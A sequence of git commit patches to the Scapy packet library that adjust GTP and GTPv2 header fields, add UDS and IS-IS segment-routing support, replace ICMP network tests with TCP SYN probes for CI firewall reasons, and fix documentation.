255 assert iocbi.controlEnableMaskRecord == b'coffee' += Check UDS_RFT + +rft = UDS(b'\x38\x01\x00\x1ED:\\mapdata\\europe\\germany1.yxz\x11\x02\xC3\x50\x75\x30') +assert rft.service == 0x38 +assert rft.modeOfOperation == 0x01 +assert rft.filePathAndNameLength == 0x001e +assert rft.filePathAndName == b'D:\\mapdata\\europe\\germany1.yxz' +assert rft.compressionMethod == 1 +assert rft.encryptingMethod == 1 +assert rft.fileSizeParameterLength == 0x02 +assert rft.fileSizeUnCompressed == b'\xc3\x50' +assert rft.fileSizeCompressed == b'\x75\x30' + += Check UDS_RFTPR + +rftpr = UDS(b'\x78\x01\x02\xc3\x50\x11') +assert rftpr.service == 0x78 +assert rftpr.modeOfOperation == 0x01 +assert rftpr.lengthFormatIdentifier == 0x02 +assert rftpr.maxNumberOfBlockLength == b'\xc3\x50' +assert rftpr.compressionMethod == 1 +assert rftpr.encryptingMethod == 1 + +assert rftpr.answers(rft) + = Check UDS_NRC nrc = UDS(b'\x7f\x22\x33') assert nrc.service == 0x7f assert nrc.requestServiceId == 0x22 assert nrc.negativeResponseCode == 0x33 - - - - From 900a32dd1634da9e4d91e19371d0ac7693d68127 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 4 Dec 2020 14:04:43 -0500 Subject: [PATCH 0426/1632] Enhancements to GTP headers (#2795) * Enhancements to GTP headers - Add EPC specific GTP-C header - Fix duplicate attributes in Gtpv2 header - UL & DL PDU Session container 3gpp specs 38 415, Figure 5.5.2.2-1 5.2.2.7 PDU Session Container * Fix gtp.py * Update gtp.py * Update gtp.py * Update gtp.py * Update gtp.uts * Update gtp.py * Update gtp.py * Add tests for conditional parameters --- scapy/contrib/gtp.py | 57 ++++++++++++++++++++++++++++++----------- scapy/contrib/gtp_v2.py | 13 +++++++--- test/contrib/gtp.uts | 8 +++--- 3 files changed, 55 insertions(+), 23 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index de40e83578a..bf369847ec5 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -316,26 +316,53 @@ class GTPPDUSessionContainer(Packet): name = "GTP PDU Session Container" fields_desc = [ByteField("ExtHdrLen", None), BitField("type", 0, 4), - BitField("spare1", 0, 4), - BitField("P", 0, 1), - BitField("R", 0, 1), + BitField("qmp", 0, 1), + ConditionalField(BitField("dlDelayInd", 0, 1), + lambda pkt: pkt.type == 1), + ConditionalField(BitField("ulDelayInd", 0, 1), + lambda pkt: pkt.type == 1), + ConditionalField(BitField("spareUl1", 0, 1), + lambda pkt: pkt.type == 1), + ConditionalField(XBitField("spareDl1", 0, 3), + lambda pkt: pkt.type == 0), + ConditionalField(BitField("P", 0, 1), + lambda pkt: pkt.type == 0), + ConditionalField(BitField("R", 0, 1), + lambda pkt: pkt.type == 0), + ConditionalField(XBitField("spareUl2", 0, 2), + lambda pkt: pkt.type == 1), BitField("QFI", 0, 6), ConditionalField(XBitField("PPI", 0, 3), - lambda pkt: pkt.P == 1), - ConditionalField(XBitField("spare2", 0, 5), - lambda pkt: pkt.P == 1), - ConditionalField(ByteField("pad1", 0), - lambda pkt: pkt.P == 1), - ConditionalField(ByteField("pad2", 0), - lambda pkt: pkt.P == 1), - ConditionalField(ByteField("pad3", 0), - lambda pkt: pkt.P == 1), + lambda pkt: pkt.type == 0 and + pkt.P == 1), + ConditionalField(XBitField("spareDl2", 0, 5), + lambda pkt: pkt.type == 0 and + pkt.P == 1), + ConditionalField(XBitField("dlSendTime", 0, 32), + lambda pkt: pkt.type == 0 and + pkt.qmp == 1), + ConditionalField(XBitField("dlSendTimeRpt", 0, 32), + lambda pkt: pkt.type == 1 and + pkt.qmp == 1), + ConditionalField(XBitField("dlRecvTime", 0, 32), + lambda pkt: pkt.type == 1 and + pkt.qmp == 1), + ConditionalField(XBitField("ulSendTime", 0, 32), + lambda pkt: pkt.type == 1 and + pkt.qmp == 1), + ConditionalField(XBitField("dlDelayRslt", 0, 32), + lambda pkt: pkt.type == 1 and + pkt.dlDelayInd == 1), + ConditionalField(XBitField("ulDelayRslt", 0, 32), + lambda pkt: pkt.type == 1 and + pkt.ulDelayInd == 1), + ByteEnumField("NextExtHdr", 0, ExtensionHeadersTypes), ConditionalField(StrLenField( "extraPadding", "", - length_from=lambda pkt: 4 * (pkt.ExtHdrLen) - 4), - lambda pkt: pkt.ExtHdrLen and pkt.ExtHdrLen > 1), - ByteEnumField("NextExtHdr", 0, ExtensionHeadersTypes), ] + length_from=lambda pkt: 4 * (pkt.ExtHdrLen) - 5), + lambda pkt:pkt.ExtHdrLen and pkt.ExtHdrLen > 1 and + pkt.type == 0 and pkt.P == 1 and pkt.NextExtHdr == 0)] def guess_payload_class(self, payload): if self.NextExtHdr == 0: diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 520034862fa..ec3a56ac151 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -256,15 +256,20 @@ class GTPHeader(gtp.GTPHeader): fields_desc = [BitField("version", 2, 3), BitField("P", 1, 1), BitField("T", 1, 1), - BitField("SPARE", 0, 1), - BitField("SPARE", 0, 1), - BitField("SPARE", 0, 1), + BitField("MP", 0, 1), + BitField("SPARE1", 0, 1), + BitField("SPARE2", 0, 1), ByteEnumField("gtp_type", None, GTPmessageType), ShortField("length", None), ConditionalField(XIntField("teid", 0), lambda pkt:pkt.T == 1), ThreeBytesField("seq", RandShort()), - ByteField("SPARE", 0) + ConditionalField(BitField("msg_priority", 0, 4), + lambda pkt:pkt.MP == 1), + ConditionalField(BitField("SPARE3", 0, 4), + lambda pkt:pkt.MP == 1), + ConditionalField(ByteField("SPARE3", 0), + lambda pkt:pkt.MP == 0) ] diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 011fb0827f9..29184dff729 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -28,14 +28,14 @@ assert a[GTPPDUSessionContainer].NextExtHdr == 0 = GTP_U_Header with PDU Session Container with QFI/PPI -a = GTPHeader(raw(GTP_U_Header()/GTPPDUSessionContainer(type=1, QFI=3, P=1, PPI=6))) +a = GTPHeader(raw(GTP_U_Header()/GTPPDUSessionContainer(type=0, QFI=3, P=1, PPI=6))) assert isinstance(a, GTP_U_Header) assert a[GTP_U_Header].E == 1 and a[GTP_U_Header].next_ex == 0x85 assert a[GTPPDUSessionContainer].ExtHdrLen == 2 assert a[GTPPDUSessionContainer].P == 1 and a[GTPPDUSessionContainer].R == 0 assert a[GTPPDUSessionContainer].QFI == 3 and a[GTPPDUSessionContainer].PPI == 6 assert a[GTPPDUSessionContainer].NextExtHdr == 0 -assert a[GTPPDUSessionContainer].type == 1 +assert a[GTPPDUSessionContainer].type == 0 = GTP_U_Header sub layers @@ -53,9 +53,9 @@ a = IP(raw(IP()/UDP()/GTP_U_Header()/PPP())) assert isinstance(a[GTP_U_Header].payload, PPP) = GTPPDUSessionContainer(), dissect -h = "fa163e7da573fa163e43f8e708004500008400000000fd119f520a0a05010a0a0502086808680070000034ff006000000010fa163e85020044000000000045000054cd4e000040015a440a0a08020a0a370100001aca0046000142cff45e00000000e2ed0c0000000000101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637" +h = 'fa163ed6de7bfa163ed82b9408004500008400000000fe114b560a0a2e010a0a2efe086808680070000034ff006000000001fa163e850200ff800000000045000054074d00004001fb490a0a31fe0a0a32010000325600930001c444ca5f00000000759e0a0000000000101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637' gtp = Ether(hex_bytes(h)) -gtp[GTP_U_Header].ExtHdrLen == 2 and gtp[GTP_U_Header].extraPadding == b'\x00\x00\x00\x00' and gtp[GTP_U_Header][IP].src == '10.10.8.2' and gtp[GTP_U_Header][IP][ICMP].type == 0 +gtp[GTP_U_Header].ExtHdrLen == 2 and gtp[GTP_U_Header].extraPadding == b'\x00\x00\x00' and gtp[GTP_U_Header][IP].src == '10.10.49.254' and gtp[GTP_U_Header][IP][ICMP].type == 0 and gtp[GTP_U_Header].type == 0 and gtp[GTP_U_Header].qmp == 0 and gtp[GTP_U_Header].P == 1 and gtp[GTP_U_Header].R == 1 and gtp[GTP_U_Header].QFI == 63 and gtp[GTP_U_Header].PPI == 4 = GTPEchoResponse matches GTPEchoRequest by seq req = GTPHeader(seq=12345)/GTPEchoRequest() From 8d4e080a83051f6d4271d5c1a26b13cbad1db412 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 6 Dec 2020 06:05:03 -0500 Subject: [PATCH 0427/1632] Remove duplicate field warnings from gtpv2 modules (#2998) * Remove duplicate field warning * Fix gtpv2 tests to remove duplicate field warning * Update gtp_v2.py * Update gtp_v2.py * Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 26 ++++++++++++++------------ test/contrib/gtp_v2.uts | 2 +- 2 files changed, 15 insertions(+), 13 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index ec3a56ac151..dfc8e5bcb57 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -31,6 +31,7 @@ ConditionalField, IPField, IntField, + MultipleTypeField, PacketField, PacketListField, ShortEnumField, @@ -266,11 +267,12 @@ class GTPHeader(gtp.GTPHeader): ThreeBytesField("seq", RandShort()), ConditionalField(BitField("msg_priority", 0, 4), lambda pkt:pkt.MP == 1), - ConditionalField(BitField("SPARE3", 0, 4), - lambda pkt:pkt.MP == 1), - ConditionalField(ByteField("SPARE3", 0), - lambda pkt:pkt.MP == 0) - ] + ConditionalField( + MultipleTypeField( + [(BitField("SPARE3", 0, 4), + lambda pkt: pkt.MP == 1)], + ByteField("SPARE3", 0)), + lambda pkt: pkt.MP in [0, 1])] class IE_IP_Address(gtp.IE_Base): @@ -512,10 +514,10 @@ class IE_UCI(gtp.IE_Base): BitField("instance", 0, 4), gtp.TBCDByteField("MCC", "", 2), gtp.TBCDByteField("MNC", "", 1), - BitField("SPARE", 0, 5), + BitField("SPARE1", 0, 5), BitField("CSG_ID", 0, 27), BitField("AccessMode", 0, 2), - BitField("SPARE", 0, 4), + BitField("SPARE2", 0, 4), BitField("LCSG", 0, 1), BitField("CMI", 0, 1)] @@ -904,11 +906,11 @@ class IE_Indication(gtp.IE_Base): ConditionalField( BitField("TSPCMI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("Spare", 0, 1), lambda pkt: pkt.length > 7), + BitField("SPARE1", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("Spare", 0, 1), lambda pkt: pkt.length > 7), + BitField("SPARE2", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("Spare", 0, 1), lambda pkt: pkt.length > 7), + BitField("SPARE3", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( BitField("N5GNMI", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( @@ -1346,10 +1348,10 @@ class IE_Bearer_QoS(gtp.IE_Base): ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), - BitField("SPARE", 0, 1), + BitField("SPARE1", 0, 1), BitField("PCI", 0, 1), BitField("PriorityLevel", 0, 4), - BitField("SPARE", 0, 1), + BitField("SPARE2", 0, 1), BitField("PVI", 0, 1), ByteField("QCI", 0), BitField("MaxBitRateForUplink", 0, 40), diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 97685464a20..eefdc57e956 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -266,7 +266,7 @@ ie = gtp.IE_list[0] ie.CSG_ID == 22 and ie.AccessMode == 0 and ie.LCSG == 1 and ie.CMI == 0 and ie.MCC == b'123' and ie.MNC == b'45' = IE_UCI, basic instantiation -ie = IE_UCI(ietype='UCI', length=8, CR_flag=0, instance=0, MCC=b'123', MNC=b'45', SPARE=0, CSG_ID=22, AccessMode=0, LCSG=1, CMI=0) +ie = IE_UCI(ietype='UCI', length=8, CR_flag=0, instance=0, MCC=b'123', MNC=b'45', SPARE1=0, SPARE2=0, CSG_ID=22, AccessMode=0, LCSG=1, CMI=0) ie.ietype == 145 and ie.CSG_ID == 22 and ie.AccessMode == 0 and ie.LCSG == 1 and ie.CMI == 0 and ie.MCC == b'123' and ie.MNC == b'45' = IE_BearerFlags, dissection From 39e85d5c3cf043eb60fd3d25d6dfb6add4abc53e Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 3 Dec 2020 18:51:06 +0100 Subject: [PATCH 0428/1632] Prepare Github Actions to run Linux root tests --- .github/workflows/unittests.yml | 17 ++++++++++++++--- .travis.yml | 22 ---------------------- scapy/sendrecv.py | 11 +---------- test/regression.uts | 10 +++++----- 4 files changed, 20 insertions(+), 40 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index cb2773c8dc4..298032c76de 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -55,16 +55,27 @@ jobs: - name: Run mypy run: tox -e mypy - # Github Actions block ICMP. We can still use it for non root tests utscapy: name: ${{ matrix.os }} ${{ matrix.python }} ${{ matrix.mode }} runs-on: ${{ matrix.os }} + timeout-minutes: 20 strategy: matrix: os: [ubuntu-latest] - python: [2.7, pypy2, pypy3, 3.5, 3.6, 3.7, 3.8, 3.9] - mode: [non_root] + python: [2.7, pypy2, pypy3, 3.9] + mode: [both] include: + # Linux non-root only tests + - os: ubuntu-latest + python: 3.6 + mode: non_root + - os: ubuntu-latest + python: 3.7 + mode: non_root + - os: ubuntu-latest + python: 3.8 + mode: non_root + # MacOS tests - os: macos-latest python: 2.7 mode: both diff --git a/.travis.yml b/.travis.yml index 2435670f9a7..911d7a270fd 100644 --- a/.travis.yml +++ b/.travis.yml @@ -7,28 +7,6 @@ cache: jobs: include: - # Run linux as root on linux. - # Non-root on linux and root/non_root on OSX are tested via GitHub CI - - os: linux - python: 2.7 - env: - - TOXENV=py27-linux_root,codecov - - - os: linux - python: pypy2 - env: - - TOXENV=pypy-linux_root,codecov - - - os: linux - python: pypy3 - env: - - TOXENV=pypy3-linux_root,codecov - - - os: linux - python: 3.8 - env: - - TOXENV=py38-linux_root,codecov - # run custom root tests # isotp - os: linux diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index d56f8d058de..d0612d2139c 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -67,15 +67,6 @@ class debug: :param timeout: how much time to wait after the last packet has been sent :param verbose: set verbosity level :param multi: whether to accept multiple answers for the same stimulus - :param store_unanswered: whether to store not-answered packets or not. - setting it to False will increase speed, and will return - None as the unans list. - :param process: if specified, only result from process(pkt) will be stored. - the function should follow the following format: - ``lambda sent, received: (func(sent), func2(received))`` - if the packet is unanswered, `received` will be None. - if `store_unanswered` is False, the function won't be called on - un-answered packets. :param prebuild: pre-build the packets before starting to send them. Automatically enabled when a generator is passed as the packet """ @@ -681,7 +672,7 @@ def send_in_loop(tobesent, stopevent): return sndrcv( pks, infinite_gen, inter=inter, verbose=verbose, - chainCC=chainCC, timeout=None, + chainCC=chainCC, timeout=timeout, _flood=_flood ) diff --git a/test/regression.uts b/test/regression.uts index 034f87917c0..dc67bccfb4d 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1375,7 +1375,7 @@ assert ssid == "ROUTE-821E295" * Those tests need network access = Sending and receiving an ICMP -~ netaccess IP ICMP +~ netaccess IP ICMP icmp_firewall def _test(): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False @@ -1422,18 +1422,18 @@ retry_test(_test) conf.L3socket = sock = Sending an ICMP message 'forever' at layer 2 and layer 3 -~ netaccess IP ICMP +~ netaccess IP ICMP icmp_firewall def _test(): - tmp = srloop(IP(dst="8.8.8.8")/ICMP(), count=1) + tmp = srloop(IP(dst="8.8.8.8")/ICMP(), count=1, timeout=3) assert(type(tmp) == tuple and len(tmp[0]) == 1) - tmp = srploop(Ether()/IP(dst="8.8.8.8")/ICMP(), count=1) + tmp = srploop(Ether()/IP(dst="8.8.8.8")/ICMP(), count=1, timeout=3) assert(type(tmp) == tuple and len(tmp[0]) == 1) retry_test(_test) = Sending and receiving an ICMP with flooding methods -~ netaccess IP ICMP +~ netaccess IP ICMP icmp_firewall from functools import partial # flooding methods do not support timeout. Packing the test for security def _test_flood(flood_function, add_ether=False): From 278b80aa7d34513031de510e435095827ed41a1d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 3 Dec 2020 23:49:32 +0100 Subject: [PATCH 0429/1632] Replace most ICMP tests with TCP:Syn --- test/linux.uts | 5 ++--- test/regression.uts | 35 +++++++++++++++++------------------ 2 files changed, 19 insertions(+), 21 deletions(-) diff --git a/test/linux.uts b/test/linux.uts index 4b56e418390..3b2e717e635 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -9,19 +9,18 @@ + Linux only test = L3RawSocket -~ netaccess IP ICMP linux needs_root +~ netaccess IP TCP linux needs_root old_l3socket = conf.L3socket old_debug_dissector = conf.debug_dissector conf.debug_dissector = False conf.L3socket = L3RawSocket -x = sr1(IP(dst="www.google.com")/ICMP(),timeout=3) +x = sr1(IP(dst="www.google.com")/TCP(sport=RandShort(), dport=80, flags="S"),timeout=3) conf.debug_dissector = old_debug_dissector conf.L3socket = old_l3socket x assert x[IP].ottl() in [32, 64, 128, 255] assert 0 <= x[IP].hops() <= 126 -x is not None and ICMP in x and x[ICMP].type == 0 # TODO: fix this test (randomly stuck) # ex: https://travis-ci.org/secdev/scapy/jobs/247473497 diff --git a/test/regression.uts b/test/regression.uts index dc67bccfb4d..b4d78eaeec6 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1388,16 +1388,16 @@ def _test(): retry_test(_test) -= Sending an ICMP message at layer 2 and layer 3 -~ netaccess IP ICMP += Sending a TCP syn message at layer 2 and layer 3 +~ netaccess IP def _test(): - tmp = send(IP(dst="8.8.8.8")/ICMP(), return_packets=True, realtime=True) + tmp = send(IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), return_packets=True, realtime=True) assert(len(tmp) == 1) - tmp = sendp(Ether()/IP(dst="8.8.8.8")/ICMP(), return_packets=True, realtime=True) + tmp = sendp(Ether()/IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), return_packets=True, realtime=True) assert(len(tmp) == 1) - p = Ether()/IP(dst="8.8.8.8")/ICMP() + p = Ether()/IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S") from decimal import Decimal p.time = Decimal(p.time) tmp = sendp(p, return_packets=True, realtime=True) @@ -1421,25 +1421,25 @@ retry_test(_test) conf.L3socket = sock -= Sending an ICMP message 'forever' at layer 2 and layer 3 -~ netaccess IP ICMP icmp_firewall += Sending a TCP syn 'forever' at layer 2 and layer 3 +~ netaccess IP def _test(): - tmp = srloop(IP(dst="8.8.8.8")/ICMP(), count=1, timeout=3) + tmp = srloop(IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), count=1, timeout=3) assert(type(tmp) == tuple and len(tmp[0]) == 1) - tmp = srploop(Ether()/IP(dst="8.8.8.8")/ICMP(), count=1, timeout=3) + tmp = srploop(Ether()/IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), count=1, timeout=3) assert(type(tmp) == tuple and len(tmp[0]) == 1) retry_test(_test) -= Sending and receiving an ICMP with flooding methods -~ netaccess IP ICMP icmp_firewall += Sending and receiving an TCP syn with flooding methods +~ netaccess IP from functools import partial # flooding methods do not support timeout. Packing the test for security def _test_flood(flood_function, add_ether=False): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False - p = IP(dst="www.google.com")/ICMP() + p = IP(dst="www.google.com")/TCP(sport=RandShort(), dport=80, flags="S") if add_ether: p = Ether()/p x = flood_function(p, timeout=2) @@ -1449,7 +1449,6 @@ def _test_flood(flood_function, add_ether=False): x assert x[IP].ottl() in [32, 64, 128, 255] assert 0 <= x[IP].hops() <= 126 - x is not None and ICMP in x and x[ICMP].type == 0 _test_srflood = partial(_test_flood, srflood) retry_test(_test_srflood) @@ -1623,7 +1622,7 @@ def _test(): conf.debug_match = True old_debug_dissector = conf.debug_dissector conf.debug_dissector = False - ans, unans = sr(IP(dst="www.google.fr") / ICMP(), timeout=2) + ans, unans = sr(IP(dst="www.google.fr") / TCP(sport=RandShort(), dport=80, flags="S"), timeout=2) assert ans[0].query == ans[0][0] assert ans[0].answer == ans[0][1] conf.debug_match = old_debug_match @@ -1637,9 +1636,9 @@ retry_test(_test) def _test(): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False - ans, unans = sr(IP(dst=["8.8.8.8", "1.2.3.4"]) / ICMP(), timeout=2, retry=1) + ans, unans = sr(IP(dst=["8.8.8.8", "1.2.3.4"]) / TCP(sport=RandShort(), dport=53, flags="S"), timeout=2, retry=1) conf.debug_dissector = old_debug_dissector - len(ans) == 1 and len(unans) == 1 + assert len(ans) == 1 and len(unans) == 1 retry_test(_test) @@ -1648,9 +1647,9 @@ retry_test(_test) def _test(): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False - ans, unans = sr(IP(dst=["8.8.8.8", "1.2.3.4"]) / ICMP(), timeout=2, multi=1) + ans, unans = sr(IP(dst=["8.8.8.8", "1.2.3.4"]) / TCP(sport=RandShort(), dport=53, flags="S"), timeout=2, multi=1) conf.debug_dissector = old_debug_dissector - len(ans) == 1 and len(unans) == 1 + assert len(ans) >= 1 and len(unans) == 1 retry_test(_test) From 9133ba5e5d374239a0867d3eeb8fca7d8122f881 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 4 Dec 2020 00:00:07 +0100 Subject: [PATCH 0430/1632] Comply to Standard_DS2_v2 ICMP firewall policy --- .config/ci/test.sh | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index ec38dc0a0e3..1de9cde2ab3 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -11,6 +11,12 @@ then # Linux OSTOX="linux" UT_FLAGS+=" -K tshark" + if [ ! -z "$GITHUB_ACTIONS" ] + then + # Due to a security policy, the firewall of the Azure runner + # (Standard_DS2_v2) that runs Github Actions on Linux blocks ICMP. + UT_FLAGS+=" -K icmp_firewall" + fi if [ -z "$SIMPLE_TESTS" ] then # check vcan From 706a33444fcd0b2fcad1a46fcc8f665c0070eafa Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 7 Dec 2020 15:29:45 +0100 Subject: [PATCH 0431/1632] Fix outdated code example in Automotive documentation --- doc/scapy/layers/automotive.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 5329579d0f2..8a35d193d66 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -630,7 +630,7 @@ Usage with python-can CANSockets:: conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} conf.contribs['CANSocket'] = {'use-python-can': True} load_contrib('isotp') - with ISOTPSocket(CANSocket(iface=python_can.interface.Bus(bustype='socketcan', channel="can0", bitrate=250000)), sid=0x641, did=0x241) as sock: + with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), sid=0x641, did=0x241) as sock: sock.send(...) This second example allows the usage of any ``python_can.interface`` object. From ab3fac563d24ae4afe589efb8787a892d7bfc2f5 Mon Sep 17 00:00:00 2001 From: "Matthias St. Pierre" Date: Tue, 8 Dec 2020 20:34:40 +0100 Subject: [PATCH 0432/1632] Fix grammatical typo. (#2991) --- doc/scapy/build_dissect.rst | 2 +- scapy/fields.py | 7 ++++--- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/doc/scapy/build_dissect.rst b/doc/scapy/build_dissect.rst index 1601332c14b..1294f78c920 100644 --- a/doc/scapy/build_dissect.rst +++ b/doc/scapy/build_dissect.rst @@ -2,7 +2,7 @@ Adding new protocols ******************** -Adding new protocol (or more correctly: a new *layer*) in Scapy is very easy. All the magic is in the fields. If the +Adding a new protocol (or more correctly: a new *layer*) in Scapy is very easy. All the magic is in the fields. If the fields you need are already there and the protocol is not too brain-damaged, this should be a matter of minutes. diff --git a/scapy/fields.py b/scapy/fields.py index 23edf8e6569..f8d556848c4 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -139,9 +139,10 @@ def update(self, anotherDict): # type: ignore @six.add_metaclass(Field_metaclass) class Field(Generic[I, M]): """ - For more information on how this work, please refer to - http://www.secdev.org/projects/scapy/files/scapydoc.pdf - chapter ``Adding a New Field`` + For more information on how this works, please refer to the + 'Adding new protocols' chapter in the online documentation: + + https://scapy.readthedocs.io/en/stable/build_dissect.html """ __slots__ = [ "name", From 4d53d36004b176b7f6e0e1b6ce8f9fcfd6e221a5 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Tue, 8 Dec 2020 20:39:33 +0100 Subject: [PATCH 0433/1632] Update witty: sectools is a dead website --- scapy/main.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/scapy/main.py b/scapy/main.py index b5c04351ca9..39e2db9d526 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -58,8 +58,7 @@ ("To craft a packet, you have to be a packet, and learn how to swim in " "the wires and in the waves.", "Jean-Claude Van Damme"), ("We are in France, we say Skappee. OK? Merci.", "Sebastien Chabal"), - ("Wanna support scapy? Rate it on sectools! " - "http://sectools.org/tool/scapy/", "Satoshi Nakamoto"), + ("Wanna support scapy? Star us on GitHub!", "Satoshi Nakamoto"), ("What is dead may never die!", "Python 2"), ] From 97ba19733ffab9b9dc6b0b10e486e1e4976a3340 Mon Sep 17 00:00:00 2001 From: tomzhu1 <74554023+tomzhu1@users.noreply.github.com> Date: Wed, 9 Dec 2020 00:23:33 +0000 Subject: [PATCH 0434/1632] Add support for segment routing IS-IS (#2960) --- scapy/contrib/isis.py | 149 ++++++++++++++++++++++++++++++++++++++++-- test/contrib/isis.uts | 40 +++++++++++- 2 files changed, 180 insertions(+), 9 deletions(-) diff --git a/scapy/contrib/isis.py b/scapy/contrib/isis.py index e5c3fd0c8dd..b7fc222e5fb 100644 --- a/scapy/contrib/isis.py +++ b/scapy/contrib/isis.py @@ -22,6 +22,10 @@ :copyright: 2014-2016 BENOCS GmbH, Berlin (Germany) :author: Marcel Patzlaff, mpatzlaff@benocs.com Michal Kaliszan, mkaliszan@benocs.com + + :copyright: 2020 Metaswitch, London (UK) + :author: Tom Zhu, tom.zhu@metaswitch.com + :license: GPLv2 This module is free software; you can redistribute it and/or @@ -48,6 +52,7 @@ * RFC 5303 (three-way handshake) * RFC 5304 (cryptographic authentication) * RFC 5308 (routing IPv6 with IS-IS) + * RFC 8667 (IS-IS extensions for segment routing) :TODO: @@ -68,8 +73,8 @@ from scapy.fields import BitField, BitFieldLenField, BoundStrLenField, \ ByteEnumField, ByteField, ConditionalField, Field, FieldLenField, \ FieldListField, FlagsField, IEEEFloatField, IP6PrefixField, IPField, \ - IPPrefixField, IntField, LongField, MACField, PacketListField, \ - ShortField, ThreeBytesField, XIntField, XShortField + IPPrefixField, IntField, LongField, MACField, PacketField, \ + PacketListField, ShortField, ThreeBytesField, XIntField, XShortField from scapy.packet import bind_layers, Packet from scapy.layers.clns import network_layer_protocol_ids, register_cln_protocol from scapy.layers.inet6 import IP6ListField, IP6Field @@ -78,7 +83,7 @@ from scapy.modules.six.moves import range from scapy.compat import orb, hex_bytes -EXT_VERSION = "v0.0.2" +EXT_VERSION = "v0.0.3" ####################################################################### @@ -379,12 +384,14 @@ class ISIS_TEDefaultMetricSubTlv(ISIS_GenericSubTlv): ####################################################################### _isis_subtlv_classes_2 = { 1: "ISIS_32bitAdministrativeTagSubTlv", - 2: "ISIS_64bitAdministrativeTagSubTlv" + 2: "ISIS_64bitAdministrativeTagSubTlv", + 3: "ISIS_PrefixSegmentIdentifierSubTlv" } _isis_subtlv_names_2 = { 1: "32-bit Administrative Tag", - 2: "64-bit Administrative Tag" + 2: "64-bit Administrative Tag", + 3: "Prefix Segment Identifier" } @@ -406,6 +413,113 @@ class ISIS_64bitAdministrativeTagSubTlv(ISIS_GenericSubTlv): FieldListField("tags", [], LongField("", 0), count_from=lambda pkt: pkt.len // 8)] # noqa: E501 +class ISIS_PrefixSegmentIdentifierSubTlv(ISIS_GenericSubTlv): + name = "ISIS Prefix SID sub TLV" + fields_desc = [ByteEnumField("type", 3, _isis_subtlv_names_2), + ByteField("len", 5), + FlagsField( + "flags", 0, 8, + ["res1", "res2", "L", "V", "E", "P", "N", "R"]), + ByteField("algorithm", 0), + ConditionalField(ThreeBytesField("sid", 0), + lambda pkt: pkt.len == 5), + ConditionalField(IntField("idx", 0), + lambda pkt: pkt.len == 6)] + + +####################################################################### +# ISIS Sub-TLVs for TLVs 149, 150 # +####################################################################### +_isis_subtlv_classes_3 = { + 1: "ISIS_SIDLabelSubTLV" +} + +_isis_subtlv_names_3 = { + 1: "ISIS SID/Label sub TLV" +} + + +def _ISIS_GuessSubTlvClass_3(p, **kargs): + return _ISIS_GuessTlvClass_Helper( + _isis_subtlv_classes_3, "ISIS_GenericSubTlv", p, **kargs) + + +class ISIS_SIDLabelSubTLV(ISIS_GenericSubTlv): + name = "ISIS SID Label sub TLV" + fields_desc = [ + ByteEnumField("type", 1, _isis_subtlv_names_3), + ByteField("len", 3), + ConditionalField(ThreeBytesField("sid", 0), + lambda pkt: pkt.len == 3), + ConditionalField(IntField("idx", 0), + lambda pkt: pkt.len == 4) + ] + + +####################################################################### +# ISIS Sub-TLVs for TLV 242 # +####################################################################### 